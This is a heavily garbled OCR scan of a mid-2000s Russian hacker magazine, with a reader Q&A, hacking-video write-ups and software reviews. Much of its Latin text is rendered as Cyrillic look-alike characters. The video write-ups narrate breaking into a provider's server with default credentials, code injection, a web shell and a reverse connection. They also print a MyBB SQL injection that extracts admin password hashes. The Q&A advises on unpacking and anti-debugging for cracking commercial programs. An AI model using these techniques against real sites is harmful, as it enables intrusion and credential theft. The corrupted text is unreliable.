щему этапу — настройке соединения сетевой карты: она не долж- 
на быть активна в системе. Для того, чтобы деактивировать ее, 
достаточно выполнить команду: 

іТсіоѵѵп еМ, где еМ — это название сетевого интерфейса. 

Далее нужно запустить скрипт для настройки непосредственно 
самого РРРоЕ-подключения: 

#ас1$І-5еІир 

Скрипт представляет собой удобный мастер, который запросит 
имя сетевого устройства (вводи рррО), логин и пароль для подк- 
лючения к РРРоЕ серверу, а также сетевой интерфейс, через ко- 
торый будет осуществлять соединение (вводи еНЮ). Помимо это- 
го нужно указать адрес ОЫЗ-серверов или значение «зегѵег», ес- 
ли ЭЫЗ-сервер назначается автоматически. После того, как 
скрипт закончит работу, ты можешь произвести подключение: 

#іТир рррО 



Для того, чтобы его отключить, выполняется аналогичная команда: 

Шот рррО 



О: Говорят, что для многих музыкальных проигрывателей есть не- 
кий плагин, который серьезно улучшает качество звучания. Ве- 
рится с трудом, но все равно решил спросить: такой плагин 
действительно есть? 

А: Если ты хоть раз крутил настройки ѴѴіпатр'а, то должен знать, что 
звучание любой композиции очень сильно зависит от настроек эква- 
лайзера. Поигравшись с частотами, можно добиться довольно ка- 
чественного звучания, а можно получить совершенно отв- 
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ратный звук. Получается, что композиция может звучать совершен- 
но по-разному на одном и том же оборудовании. Плагинов, которые 
предназначены для автоматической коррекции параметров воспро- 
изведения, поголовно обещающих более качественный звук, на са- 
мом деле немало. Среди них особенно выделяется ЭРХ 
(і /ѵтѵ.іхзоипсі.сот ). Продукт разрабатывают настоящие профи, поэ- 
тому его по достоинству оценили как любители, так и музыкальные 
профи. После его установки звучание композиций действительно 
становится намного приятнее — по крайней мере, субъективно. Та- 
кой эффект достигается за счет совершенствования частотных ха- 
рактеристик, которым, собственно, и занимается этот плагин. С по- 
мощью ОРХ устраняются два главных недостатка: срез высоких час- 
тот и недостаточное разделение стереобазы и ее глубины. Более то- 
го, он добавляет виртуальные режимы ЗБ ЗиггоипсІ и ЗирегВазз, ко- 
торые наверняка не поддерживаются твоей акустической системой. 
Существуют версии ЭХР для ѴѴіпатр (2.x и 5.x), МизістаІсИ ^кеЬох, 
ѴѴіпсІоѵѵз Месііа РІауег (9/10), ВеаІРІауег, РІеаІОпе, Зопіцие и ѵШіѵег 
Месііа ѵІикеЬох и т.д. Говорят даже, что существует порт под 
Ыпих'овые проигрыватели, но мне их найти не удалось :(. 

О: Некоторые пользователи еще толком не успели освоиться с 
А08І_, как некоторые провайдеры объявили о внедрении новой 
технологии — А08І-2. Что это за зверь, и какие он имеет преи- 
мущества? 

А: Технология АЭ5І_2 и ее ближайшая родственница АЭ5І-2+ — это 
серьезный рывок вперед относительно обычного АЭ5І_. Как извест- 
но, максимально возможная скорость АЭ5І_-соединения приблизи- 
тельно равна 8 Мбит/с. Столь высокая скорость может быть достиг- 
нута исключительно на хорошем оборудовании, идеальной линии и 
при условии небольшого расстояния до мультиплексора провайдера. 
На практике 6 Мбит/с — это тот максимум, который могут гарантиро- 
вать тебе провайдеры. Новомодные технологии значительно подни- 
мает эту рамку. В случае АЭ5І_2 максимальная скорость составляет 
уже 12 Мбит/с. А за счет увеличения несущей частоты (с 1 .1 МГц до 
2.2 МГц) удается добиться и вовсе 25 Мбит/с, что и реализовано в 
АЭЗІ-2-і-. Более того, новые технологии позволяют объединить сразу 
несколько «медных» каналов и добиться скорости, сравнимой с оп- 
товолоконной. Все это счастье достигается за счет использования 
совершенно новой модуляции, снижающей избыточное кодирование 
и передачу служебной информации. Благодаря автоматической ре- 
гулировке скорости, новые технологии смогут работать на более за- 
шумленных линиях и больших расстояниях от провайдера. В случае 
изменения условий в канале, АЭЗІ_2 автоматически и без обрыва со- 
единения изменит скорость так, чтобы улучшить качество связи, пре- 
дотвращая появления ошибок в передаче. К слову, даже если дис- 
коннект произойдет, то связь восстановится всего за 3-4 секунды. В 
АЭЗІ_ для этого может потребоваться до 10 секунд. Примечательно, 
что для использования АЭЗІ-2+ многим даже не придется менять 
оборудование, так как многие производители модемов выкладывают 
прошивки для поддержки этих технологий. 

О: Объясни на пальцах, что собой представляет переполнение бу- 
фера, и почему эта уязвимость так опасна? 

А: Я не со вру, если скажу, что переполнение буфера — это на- 
иболее распространенная ошибка в ПО. Все знают об ее суще- 
ствовании, однако программисты по-прежнему допускают мас- 
су ляпов в коде. Любая программа получает данные от пользо- 
вателя — это факт. Если пользователь всегда вводит только 
корректные значения данных, то прога отлично их переварива- 
ет. Другой дело, если в программе в качестве текущей даты 
указать, например, 1000 нулей. Если программистом не пре- 
дусмотрена обработка этой исключительной ситуации, то про- 
изойдет переполнение буфера. Конечно, это самый примитив- 
ный пример: публикуемые на зесигііу-сайтах эксплойты осно- 
вываются на более изощренных путях переполнения, но не в 



этом суть. Само по себе переполнение не очень опасно и гро- 
зит, как максимум, вылетом программы. Однако если перепол- 
нять буфер не наобум, а заведомо внедряя в него зловредный 
код и подменяя адрес возврата на функцию, то можно добить- 
ся более серьезного эффекта. Если все сделать грамотно, то 
ввиду специфики ОС этот зловредный код будет выполнен, и 
тогда... О том, как правильно переполнять буфер и писать свои 
шелл-коды, рекомендую прочитать статью ѵѵѵѵѵѵ.ѵѵазт.ги/агіі- 
сІе.рІір?агіісІе=Ьиі_оѵег4пооЬ, а также статьи схожей тематики 
с тѵі /ѵ.ѵоісі.ги и ѵѵт /ѵ.зесигіІуІаЬ.ги 

О: Недавно купил себе новую материнку и был удивлен, что на 
ней установлен какой-то непонятный 24-пиновый разъем для бло- 
ка питания. И у моего друга есть такой же. Но раньше я таких ни- 
когда не видел... Зачем он нужен, если и без него все отлично ра- 
ботает... 

А: Этот разъем обеспечивает материнской плате дополнитель- 
ные 12 вольт напряжения. На системах с малым энергопотреб- 
лением можно обойтись и без него. Однако там, где использу- 
ется мощные процессор и видюха, его использование будет 
очень кстати. На материнской плате это повысит надежность 
контактов, а также уменьшит тепловыделение и падение нап- 
ряжения на них. 

О: Я довольно долгое время в качестве серверной ОС использо- 
вал І_іпих и, соответственно, файрвол ірІаЫез. Освоил я его осно- 
вательно, но ситуация переменилась. Начальство требует устано- 
вить РгееВЗР, но я пока не в ладах с іріѵѵ. Может быть, есть спо- 
соб его настроить максимально комфортно? 

А: На самом деле есть отличная утилита, с помощью которой ты легко 
сможешь отконфигурировать и ірІаЫез, и ірсііаіпз, и іріѵѵ, и любой дру- 
гой популярный брандмауэр. Имя этой чудной программы РігеѵѵаІІ 
Виіібег (і ш/ѵѵМЬиіІсІег.огд ). Фишка заключается в том, что тебе не при- 
дется заморачиваться на синтаксисе какого-то конкретного файрвола: 
в РВ все делается визуально. Кинул на рабочую область одну подсеть, 
затем другую, настроил между ними шлюз и т.д. Такой подход не толь- 
ко облегчает конфигурирование неопытным пользователям, но и поз- 
воляет полностью сконцентрироваться на составлении правил безо- 
пасности. Рекомендую попробовать, программа как раз для тебя! 

О: Я рад, что X начал освещать тему взлома программ. Намедни 
установил дебаггер ОІІуЭВѲ и попытался посмотреть ассемблер- 
ный код одной коммерческой программы. И если раньше проблем 
с этим не возникало, то теперь отладчик отказывается работать, 
ссылаясь на то, что не может извлечь таблицы импорта и т.п. Дол- 
го ругается и, в конце концов, выдает нечленораздельный код. В 
чем может быть проблема? 

А: Скорее всего, отлаживаемая программа упакована. Многие 
разработчики делают это намеренно, чтобы затруднить про- 
цесс отладки. Проверить это несложно, так как название и 
версию упаковщика изящно определяет небольшая утилита 
РЕЮ (реіб.Иаз.іІ). Очень важно выяснить точную версию упа- 
ковщика, потому что от этого сильно зависят дальнейшие 
действия. Распаковку можно провести вручную, но для этого 
нужен приличный опыт или грамотные статьи, которые неред- 
ко публикуются на \/ѵ\/ѵ\/ѵ.сгаск!аЬ.ги. Если упаковщик не очень 
мудреный, и программист не использовал другие антиотла- 
дочные средства, то с распаковкой справятся специальные 
утилиты. Наиболее популярные и проверенные временем эк- 
земпляры лежат здесь — ѵѵѵѵѵѵ.сгаскІаЬ.ги/сІо\лтІоасІ/Іізі.р[ір?І=9. 
Я нередко использую Оиіск ІІпраск и полностью им доволен. 
Чтобы отлаживаемая программа не определила использова- 
ние дебаггера, рекомендую использовать специальные плаги- 
ны. Для ОІІуЭВО их можно скачать с официального сайта 
иду и /.оІІусІЬд.сІе. 
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читпй 

журнт 



ррю геймеров 



нрірщі тлъ ашюмі 






О И 



шее Россия; 
кто полетит 
в Сингапур? 



«1, 1001 

■ 'ЧЯНИі 

* Сооііег 

МИЧ ЧИП ЧІ по 

и Сагеиаддіо 



аКе Ч: , 

ибе репер теме на о и 



О . -5РОГІ 



\ЪХ75 



В первом номере: 



На страницам 
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Этот ролик демонстрирует проникновение на не- 
кую провайдерскую машину, которая практичес- 
ки наглухо зафильтрована файром. Первым де- 
лом, наш герой заходит на сайт и принимается 
изучать его содержимое. На проверку первым 
попал чат — как оказалось, он крутится на каком- 
то гнилом паблик-движке, сорцы которого можно 
без проблем найти на портале ѵѵоѵѵеЬ.ги. Чел сли- 
вает сорцы чата и смотрит, где можно добыть 
список его юзеров с паролями (вдруг один из них 
окажется админом портала?). Юзеры, как нет- 
рудно догадаться, лежат ровными штабелями в 
/сіаіа/изегз/, но, к сожалению, приватную инфу о 
них просмотреть нельзя — все файлы в формате 
*.рНр. Хотя сам факт, что диру с юзверями можно 
просмотреть, заставил героя задуматься — судя 
по всему, файл .Ніассезз на сервере не обраба- 
тывается апачем (отключена директива в 
ИйрсІ.сопІ). Далее он заходит на форум и тихонь- 
ко охреневает. Форум, судя по всему, какой-то 
кустарный, что скорее всего означает отсутствие 
критических уязвимостей под данную версию. 
Ничего страшного — заходим в гугль и вводим 
"ЗоКѵѵаге РВІапд 4 ехрІоіГ. На багтраках мельком 
проскальзывает, что если сформировать запрос 
вида МІр://ѵѵѵѵѵѵ.ехатрІе.сот/кустарный_форум/ 
зепфт.рІір?іо=юзер&зиЬ}=любаятема&пипп=1&огід=/ 
іюте/риЫіс_ііІтІ/рЫапд/сІЬ/тетЬегз/юзер, то мож- 
но получить доступ к конфиденциальной инфе 



юзера, в том числе и к хэшированному паролю. 
Сформировав запрос, мэн пытается получить 
пасс админа — тауигеѵ'а. Но атака успешно про- 
валивается ;). Почесав репу, хаксор вспоминает, 
что ФІассезз в чате не обрабатывался как следу- 
ет. Главный герой пытается внаглую увидеть со- 
держимое каталога с пользователями форума в 
папке сІІэ/тетЬегз. Как ни странно, перед ним 
разворачивается довольно таки нехилый список 
членов (то есть мемберов ;)), в том числе и ме- 
гаадмина тауигеѵ'а. Причем каждый юзерский 
профайл содержит тсІ5-хэш пароля. К сожале- 
нию, пасс оказывается довольно-таки наркома- 
нский, и брутфорсу никак не поддается. Прихо- 
дится идти другим путем. Мэн возвращается на 
сайт и замечает, что путь к индексу выглядит при- 
мерно так: Шр//тт.ѵізр.сот.иа/зіІе/3/іпсІех.рІір. Меж- 
ду прочим мы можем спокойно гулять по всем 
папкам, которые лежат в /зііе/ — хтацесс же не 
выполняется, и опция Іпсіехез не отключена ;). 
Так вот, в папке /зііе/ лежат диры /3, /4, /5, и в 
последних двух находятся свежезалитые и нею- 
заные СМ3 2ЕЫЕП РНР. В цмс, конечно же, есть 
форма авторизации. Первым делом, что нужно 
взломщику — перейти на оффсайт системы и 
скачать исходники, чтобы найти в них дефолтные 
учетные записи. Получив ее, (асітіп) герой вижу- 
алхаков ломится в центр управления сайтом и 
пытается залить на машину ѵѵеЬ-шелл или вы- 
полнить злостный рНр-код в системе. К его удив- 
лению, записать код не удается — изменения не 
сохраняются. Аналогичные действия он проводит 
и в папке /4 (там та же цмс, только с другим ски- 
ном). Призадумавшись, мэн решил зайти в раз- 
дел управления юзерами. Как оказалось, адми- 
нскими правами наделен не юзер асітіп (как по 
дефолту), а учетная запись тауигеѵ (где-то я уже 
его видел). Самое интересное, что пользователю 
«маюреву» можно поменять пароль. Наш герой 
так и поступает — логиниться под «маюревом» и 
вставляет злостный код для выполнения команд 
в раздел «Счетчики» (именно там рнр-тэги не ре- 
жутся). В последствии, на машину был залит веб- 
шелл и произведен реверс-коннект. Далее дело 
оставалось за малым — найти систему биллинга. 

[МуВВ ЬоагсІ Иаскіпд 
автор видео: СІ_КіІІег] 

Совсем недавно в багтраках висела новость о 
многочисленных уязвимостях в форуме МуВВ. 
Ошибка типа зцИпіесйоп скрывалась в скрипте 
зеагсН.рНр — переменная иісі не фильтровалась 



на присутствие левых символов, в результате че- 
го стало возможно внедрить посторонний 301- 
запрос. Выглядела инъекция примерно так: 

зеагсИ.рИр?ас1:іоп=1 : іпсІизег&иісІ=-1 1 ІІЫІОЫ ЗЕІ.ЕСТ 
иісі, иісі, иісі, иісі, иісі, иШ, иісі, иісі, иісі, иісі, иісІ.иШ.иісІ 
, иісі, иісі, изегпате.раззѵѵогсі РВОМ туЬЬ_изегз 
ѵѵііеге изегдгоир=1Г 

Под этот баг неизвестными кодерами был написан 
эксплойт, который возвращал хакеру Іодіп и мдб-хэш 
администратора. Данный сплоит был написан доста- 
точно коряво, поэтому хакер со своим кентом-кори- 
шем решили переписать сплоит, сделав его более 
удобным и работоспособным (ШрУ/зесигіІуіпІо.ги/ѵѵтѵ/ 
ирІоасІ/туЬЬ.ІхІ). В этом видео хакер демонстри- 
рует, как можно в считанные минуты стать адми- 
ном одного из МуВВ-форумов. Прежде всего, ха- 
кер устремляется на поиски свежей жертвы, гугл 
в этом незаменимый помощник. После этого он 
начинает тестирование своего эксплойта. Сплоит 
требует указания следующих параметров: хост 
атакуемой жертвы, путь к форуму и Ю нужного 
пользователя (или ісі админа, то есть 1). Через 
некоторое время после запуска сплоита, хаксор 
получает логин и тсІ5-хэш пароля админа. Для 
того чтобы его расшифровать, нужно брутить по- 
лученный хэш. Какую программу он для этого ис- 
пользует, ты, полагаю, догадываешься — 
тсібіпзісіе. Хакер пробует юзать свои словари, в 
результате чего получает положительный ре- 
зультат. Сам понимаешь, что хакер теперь не 
только взломщик, а еще и админ форума :) © 
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ѴѴІМЭОѴѴЗ 

МШ-ТІМЕРІА 

Ізі РѴР Віррег 5.1.1 
АСОЗее 7.0.102 
АЬеасІ ОѴР Віррег 2. 1.1.1 
АоА РѴР СОРУ 2.3 
АѴІ Іо РіѵХ 2.1 
Вигпаіопсе 0.99.5 
СооІ ЕсШ Рго 2.1 
РѴР-СІопег 2.50 
РѴР-ТО-АѴІ 2.1 
Еазу СР Віррег 2.37 
Еазу СО-ОА Ехігасіог 8.2.1 
Еазу ОѴО Сіопе 3.0.5 

ІІІЧІХ 

МШ.ТІМЕОІА 

РАисІіо Сопѵегі 0.2.2 
РІазЬ Іог Ііпих 0.2 
МРІауег 1.0рге71гу2 
Одіе ОѴО ріауег 0.9.2 



К-І-іІе Сосіес Раск 2.53 
Масготесііа РІазіі Ріауег 
Ыего Вигпіпд Вот 6.6.0.16 
ЗпадІІ 7.2.4 

Зирег ОѴО Віррег 2.39а 
Тад&Вепате 3.2 ВС 2 
ѴігІиаЮиЬ 1 .6.1 0 зІаЫе 
ѴѴіпатр 5.1 

ЙЁТ 

&Вй 0.9. 6.8 

Аѵапі Вгоѵѵзег 10.1 Ьиіісі 23 
Вегзігс 2.2.14 
ВиІІеІРгоо! РТР 2.45 



Хіпе 1.0.1 
ХММ3 1.2.10 

ЫЕТ 

Ооѵѵпіоасіег Іог X 2.5.3 



СиІеРТР ХР 5.0.4 Виіісі 
еМиіе 0.46с 

РІазМРХР 3.2.0.1080 РіпаІ 

РІазЬбе1 1.71 

Рохтаіі 5.0.800.0 
СеІВідМ 5.2сІ 
ІСО Рго 2003Ь Ьиіісі 3916 
ІпсгесІіМаіІ Виіісі 2068 
Іпіегпеі ОоѵѵпіоасІ 
Мападег 4.0.6 
Іпіегпеі Ехріогег 7.0 Ьеіа 
іВасІіо 1.4.0.402 
Маіі Оігесі 2.1 .5.0 
Маіі Тііет Рго 7.2 
МсАІее.сот ЗратКіііег 4.0 
Мігапсіа ІМ 0.4.0.1 
тІВС 6.16 
Моііііа Рігеіох 1.0.6 
Моііііа ТЬипЬегЬігсі 1.0.6 
Му РТР 1.3.2 
Орега Іог ѴѴіпсІоѵѵз 8.02 
РиТТѴ 0.58 
Вебеі Реіихе 4.2 Виіісі 
ЗесигеСВТ 5.02 
ЗесигеРХ 3.0.2 
5М5-І1 3.3.4 



дРТР 2.0.18 
Нед 1.3.0 
МЫопкеу 2.6.4 
Моііііа Рігеіох 1.0.6 
Орега 8.02 



ЗоскзСІіаіп 3.11.148 
ТМе Ваі! Ргоіеззіопаі 3.51 
Х-СЬаІ 2.4. 5Ь 



РЕѴЕІ.ОРМЕІ1Т 

АсІіѵеРегі 5.8.7.813 
АрасЬе РІТТР Зегѵегіог 
ѴѴіпсІоѵѵз 2.0.54 
ВиііеІРгооІ РТР Зегѵег 
2.4.0.31 Веіа 
ОеОе 3.50.02.1619 
РіЗоЙ Регі Есіііог 5.6.0.7 
НехѴѴогкзЬор 4.23 
Ніеѵѵ 7.01 
ЮА РВО 4.8 сіето 
МуЗОІ Асітіпізігаіог Тог 
ѴѴіпсІоѵѵз 1.0.12 
РНР 5.1.0 ВС1 Іог ѴѴіпсІоѵѵз 
Зегѵ-ІІ 6.1. 0.1 

ѴѴ32РАЗМ 8.94 

$У$ТЕМ 

Адпііит Оиірозі РігеѵѵаІІ Рго 
Апіі-Кеуіоддег Еіііе 1.0.0 
ВезІСгурІ 7.20.2 
СгурІоЕхрегІ 2005 



РгоРТРР 1.3.0 ВС2 
Зяиісі 3.0 РВЕЗ-20050821 
Ш-РТРР 2.6.2 
Х-СІіаІ 2.4.4 
хМиіе 1.10.0 



Ргоіеззіопаі 6.20 
ЕхеЗІііеісІ Реіихе 1.2.21 
Казрегзку Апіі-Ріаскег 
Казрегзку Апіі-Ѵігиз Регзопаі 
2006 6.0.13.183 Веіа 
ЬЗРТесЬ РгіѵаІеРізкІ.ЗО 
МасРгіѵе 6.0.6 Веіа 1 
І\Іог1оп АпІіѴігиз 2006 Ьеіа 
РЕСотрасІ 2.64 
Ііпсіеіеіе МОѴѴ! 1.0 
УРХ 1.92 Веіа 



МІЗС 

7-2ір 4.26 Ьеіа 
ЕазуѴѴогсІ 2001 
РАВ Мападег 1705 
Іппо Зеіир 5.1.5 
МАКЕМ5І 05.238 
МЗІВиіШег 2.0.0.25 
N0115011 Іпзіаііаііоп Зузіет 
Тоіаі Соттапбег 6.53 
Ш1гаЕсІі1-32 ІІ.ЮЬ 
ѴѴіпАсе 2.6.0 
ѴѴіпВАВ 3.50 

ѴѴіп2ір 9.0 ЗВ1 Виіісі 6224 
ѴѴізе Іпзіаііаііоп Зузіет 9.02 



ЗУЗТЕМ 

новые ядра Ііпих 
Ьіпб 8.4.6 
ОрепЗЗН 4.2р1 
ОрепЗЗЬ 0.9.8 
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Затигііе 1.62 
е-РаіпІ 2.0.16 
6Х::Тгап5СОСІег 2.20.2737 
ВС2 

МрЗІад 2.32Ь 
ТгаІІісСотргеззогО.І 
Виіісі 145 
Софт из рубрик 



ѴІЗІІАІ_ НАСК ++ РРР АРЮНІѴЕ 

Взлом провайдера ][АКЕР 

МуВВ ЬоагЬ Ьаскіпд ][акер 2005 — 07 (79) 

][АКЕР СПЕЦ 

][акер Спец 2005 — 07 
(56) 

ЖЕЛЕЗО 

Железо 07(17) _ 

МС 

МоЫІе Сотриіегз 07(58) 

ЛУЧШИЕ 

ЦИФРОВЫЕ 

КАМЕРЫ 

Лучшие цифровые 
камеры 07(10) 



Атаііпд Резкіор ѵ 2.0 
СгаіуТаік ѵ 4.0 Месііа 
Зіисііо 

ЗеагсЫпІогт ѵ 1.6 
МахіѴізІа ѵ 2.0 
ВезІогеІТ ѵ 6.5 
ІсопХ ѵ 1.1 
ЗоІІВазе ѵ 2.0 
Ехііапб Аззізіапі ѵ 2.0 
ЗЬиІсІоѵѵп Ьоск ѵ 1.4 
Сасіиз Етиіаіог 2.0 
Саіт 1.4.0 Іог ѴѴіпсІоѵѵз 





Атагіпд Ое$к(ор ѵ 2.0 

ѴѴіпсІоѵѵз 9х/Ме/ІЧТ/2к/ХР 

Зіге: 2649 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.атагіпдсіезкіор.сот 



Представь себе такую ситуацию: ты 
работаешь в одной программе, при 
этом постоянно посматривая в окош- 
ко другой. Как сделать, чтобы окна 
этих программ не перекрывали друг 
друга? Подправить размеры окон 
мышкой? Раз-другой можно так и 
поступить, но затем подобные мани- 
пуляции начинают вызывать раздра- 
жение... Нет, лишь специальный 
софт, автоматически распределяю- 
щий экранное пространство между 
открытыми окнами, способен выручить в этой ситуации. Об одном представи- 
теле данной разновидности ПО я уже тебе как-то рассказывал (ѴѴіпбоѵѵЗігег, 
уѵуѵуѵ. ѵѵіпсіоуѵзігег. сот ) , но на днях я наткнулся на еще более интересную раз- 
работку — утилиту Атагіпд Оезкіор. После запуска эта прога формирует от- 
дельный виртуальный экран, который разделен на две области — верхнюю и 
нижнюю. В любую из этих областей можно вывести окно нужного тебе прило- 
жения. Причем в каждой области есть небольшая панель закладок, позволя- 
ющая сделать привязку к десяти различным окнам и переключаться между 
этими окнами практически мгновенно. Просто? Просто! А что в результате? А 
в результате ты можешь, к примеру, печатать текст в ѴѴогсГе (нижняя область), 
то и дело сверяясь с таблицами и веб-сайтами, выводимыми в верхней облас- 
ти. Удобно? Не то слово! Для серьезных пользователей Атагіпд Оезкіор — 
эта чистый гтіизі Ііаѵе, к тому же аккуратно запрограммированный и наделен- 
ный целым рядом дополнительных фишечек, позволяющих использовать 
пространство экрана еще более эффективно. 

СгагуТаІк ѵ 4.0 Месііа біисііо 

ѴѴіпсІоѵѵз 9х/Ме/ІМТУ2к/ХР 

Зіге: 27516 КЬ 

ЗІпагеѵѵаге 

ѵѵѵѵѵѵ.геаііизіоп.сот/сгагуіаік 



Мощный инструмент для оживления цифровых фотографий людей и 
животных. Самая подходящая прога, если тебе хочется над кем-ни- 



будь подшутить или приколоться. Загоняешь в СгагуТаІк исходное 
изображение, указываешь с помощью ключевых точек месторасполо- 
жение глаз, рта и носа, очерчиваешь овал лица и можешь приступать 
к свободному творчеству. Полет твоей фантазии практически ничем 
не ограничен! Во-первых, ты можешь заставить лицо на фотке произ- 
носить нужную тебе речь, вполне правдоподобно, шевеля при этом гу- 
бами. Во-вторых, специальный блок эмоций СгагуТаІк поможет тебе 
сделать так, чтобы твой виртуальный персонаж по ходу произнесения 
речи в нужных местах улыбался, хмурился или корчил рожи. В-треть- 
их, поскольку исходная картинка зачастую не дает достаточной ин- 
формации для формирования правдоподобных моделей зубов и глаз, 
программа еще на начальной стадии предлагает тебе обратиться в 
специальную библиотеку «протезов» (среди которых, надо сказать, 
есть и на редкость оригинальные изделия :)). Конечный результат экс- 
периментов по первому твоему требованию записывается в видео- 
файл заданного формата. Кстати, еще раз хочу отметить, что, нес- 
мотря на всю несерьезность идеи, программу СгагуТаІк никак нельзя 
обвинить в примитивности. Наоборот, ее инструменты настолько 
серьезны и продуманы, что с их помощью можно формировать любые 
движения виртуального персонажа — от изменения направления 
взгляда до легкого пожатия плеч. 

8еагсНІпіогт ѵ 1.6 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 2957 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.зеагсіпіпіогт.сот 



Локальных полнотекстовых поисковых систем сейчас появилось види- 
мо-невидимо. А Місгозоф Ооодіе и УаИоо! соответствующие разработки 
уже даже даром раздают — чисто в рекламных целях! Но вот беда, эти 
разработки в нашей стране, не смотря на свою халявность, особой по- 
пулярностью не пользуются. У нас ведь к подобного рода прогам требо- 
вания довольно жесткие. Нам ведь поддержку целого ряда альтернатив- 
ных кодировок подавай, да и поиск с учетом морфологии русского язы- 
ка вести требуется. А такими способностями обычно обладают лишь 
продукты отечественного производства. Вот, к примеру, программа 
ЗеагсМпІогт указанными способностями наделена в полной мере. Бо- 
лее того, сейчас ее разработчики исполнили давнюю мечту всех русско- 
язычных пользователей — научили свое творение индексировать почто- 
вые базы не только мелко-мягкого ОиІІоок'а, но и гораздо более попу- 
лярного у нас мейлера ТНе Ваі! . Я сам в полном восторге от такой фи- 
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шечки, поскольку у меня теперь 
абсолютно все документы лопатит 
один-единственный поисковый ме- 
ханизм. В пользу ЗеагсМпІогт 
также говорит высокая скорость 
индексирования, небольшой раз- 
мер индекса, поддержка практи- 
чески всех распространенных фор- 
матов текстовых файлов (включая 
бос, рсІТ, НІгтіІ, тэгов трЗ и аѵі), кор- 
ректная работа с архивами и воз- 
можность поиска документов с оп- 
ределенными атрибутами (по размеру файла, по теме письма, по симво- 
лам, содержащимся в названии и так далее). В общем, ЗеагсЫпІопті надо 
качать и юзать. Тем более, что для всех любителей халявы наши разработ- 
чики, следуя общемировым веяньям, подготовили еще и абсолютно бесп- 
латную версию ЗеагсИІпІогт, пусть и слегка функционально урезанную. 

МахіѴізІа ѵ 2.0 

ѴѴіпсІоѵѵз 2к/ХР 

Зіге: 1834 КЬ 

ЗІіагеѵѵаге 

ѵѵѵѵѵѵ.тахіѵізіа.сот 




Давно хотел попробо- 
вать, насколько это кру- 
то — работать на двух 
мониторах сразу. К со- 
жалению, второй мони- 
тор и дополнительную 
видеокарту я до сих пор 
себе так и не купил. Но 
я не расстраиваюсь. 

Особенно сейчас, когда 
узнал о существовании 
софта, позволяющего 
использовать в качест- 
ве дополнительного мо- 
нитора любой ноутбук. 

Называется этот софт 
МахіѴізІа. Для передачи 
видеоданных МахіѴізІа 
использует не видеокабель, а сетевое соединение между компьютерами. 
Причем — я проверил — эта система и в самом деле прекрасно работает! 
Винды даже не замечают хитрости — просто в свойствах экрана у тебя по- 
является еще один дополнительный монитор! 

Что можно сказать сразу о работе на двух мониторах? Разумеется, клас- 
сно! Особенно, если тебе по ходу дела приходится одновременно опери- 
ровать большим количеством открытых приложений и документов. 
Конечно, постоянно использовать ноутбук как второй монитор не стоит, 
однако нет ничего плохого, если ты будешь время от времени юзать его в 
этом качестве. Подключение-то занимает всего несколько секунд. В моей 
домашней сети МахіѴізІа даже настройки не потребовала — сама все ми- 
гом нашла! Кстати, что я все «ноутбук», да «ноутбук». С таким же успе- 
хом можно юзать данное ПО в обычных компьютерных классах. Ну, сам 
подумай! Если твой сосед не пришел — почему его компьютер должен 
простаивать? Поворачивай дисплей чужой машинки на себя и запускай 
МахіѴізІа — повышение производительности труда тебе гарантируется! 




ПезІогеІТ ѵ 6.5 



ѴѴіпсІоѵѵз 2к/ХР 
Зіге: 48880 КЬ 

ЗІпагеѵѵаге 

ѵѵѵѵѵѵ.іагзіопе.сот 



Ребята из РагЗіопе ТесНпоІоду продолжают адаптировать свой фирмен- 
ный продукт для широких масс пользователей. На этот раз ими был пол- 
ностью переписан интерфейс управляющего модуля ВезІогеІТ, стартую- 
щего еще до загрузки операционной системы, и добавлен красочный 
онлайновый Неір-мультик, наглядно объясняющий принципы работы с 
данным софтом. Так что, если ты, приятель, до сих пор обходил 
ВезІогеІТ стороной, сейчас самое время это дело исправить. Если же об 
этой крайне ценной проге ты вообще слышишь первый раз, позволь 
провести маленький ликбез. 

Итак, ВезіогеІТ — это, пожалуй, лучшая система защиты компьютера от 
вирусов, программных сбоев и ошибок пользователя. Последние нес- 
колько лет именно она оберегает мои винды от гибельных последствий 



непрерывного тестирования самого 
разнообразного софта. Работает 
прога просто, как все гениальное: 
ты фиксируешь текущее состояние 
машины путем создания контроль- 
ной точки, а прога отслеживает и 
сохраняет в защищенном разделе 
диска все изменения файловой 
системы. Если что-то пойдет не так, 
ВезІогеІТ просто возьмет и вернет 
твой жесткий диск/диски в одно из 
ранее зафиксированных состояний. Активируется/деактивируется эта за- 
щита одним кликом (без перезагрузки машины). Решил поиграть — вык- 
лючил, ресурсы освободились. Захотел узнать, что сделает с твоей систе- 
мой новый вирус — включил ВезІогеІТ, проверил... Кроме того, послед- 
ние версии этой проги позволяют восстанавливать предыдущие состоя- 
ния отдельных файлов, а не только всей файловой системы целиком. К 
тому же зарегистрированная версия ВезІогеІТ может создавать аиіо- 
гесоѵег СОЮѴО с образом выбранного диска — многие серьезные поль- 
зователи программы уже по достоинству оценили эту ее фишечку. 

ІсопХ ѵ 1.1 

ѴѴіпсІоѵѵз 9х/Ме/І\ІТ/2к/ХР 

Зіге: 1642 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.зіагсіоск.сот/ргосіисіз/ісопх 





Компания Зіагбоск не перестает 
радовать нас своими оригинальны- 
ми разработками, предназначен- 
ными для изменения интерфейса 
ѴѴіпсІоѵѵз в лучшую сторону. Прог- 
рамма ІсопХ — ее новый продукт, 
радикально улучшающий внешний 
вид и поведение иконок, которых 
всегда полным-полно на Рабочем 
столе любого пользователя. Самое 
приятное, что сразу же после за- 
пуска прога подхватывает те иконки, что у тебя уже есть, и заставляет 
их выглядеть заметно красивее. Небольшая же настройка вообще прев- 
ращает твой экран в восьмое чудо света. Во-первых, ІсопХ допускает 
увеличение иконок до заданного размера без ухудшения их внешнего 
вида (применяется механизм сглаживания). Во-вторых, иконки можно 
заставить отбрасывать стильные тени, можно сделать сами иконки по- 
лупрозрачными или даже придать всем иконкам нужный тебе оттенок. 
Ну а в-третьих, ты можешь настроить иконки на то, чтобы они взаимо- 
действовали с курсором мыши. К примеру, ІсопХ без труда позволяет 
добиться того, чтобы под курсором мышки твои иконки плавно увеличи- 
вались в размерах и тихо попискивали. ІсопХ допускает и индивидуаль- 
ную работу с иконками (замену стандартной ІСО'шки подходящей кар- 
тинкой в формате РЫО). Само собой, есть функция загрузки/сохранение 
готовых тем. Несколько таких тем идет в комплекте с программой. 

Есть лишь одна проблема — на халяву разработчики выдают версию с 
очень ограниченными возможностями. Но, с другой стороны, ссылки на 
«расширенную версию» и ключи к ней уже вовсю гуляют по инету:). 



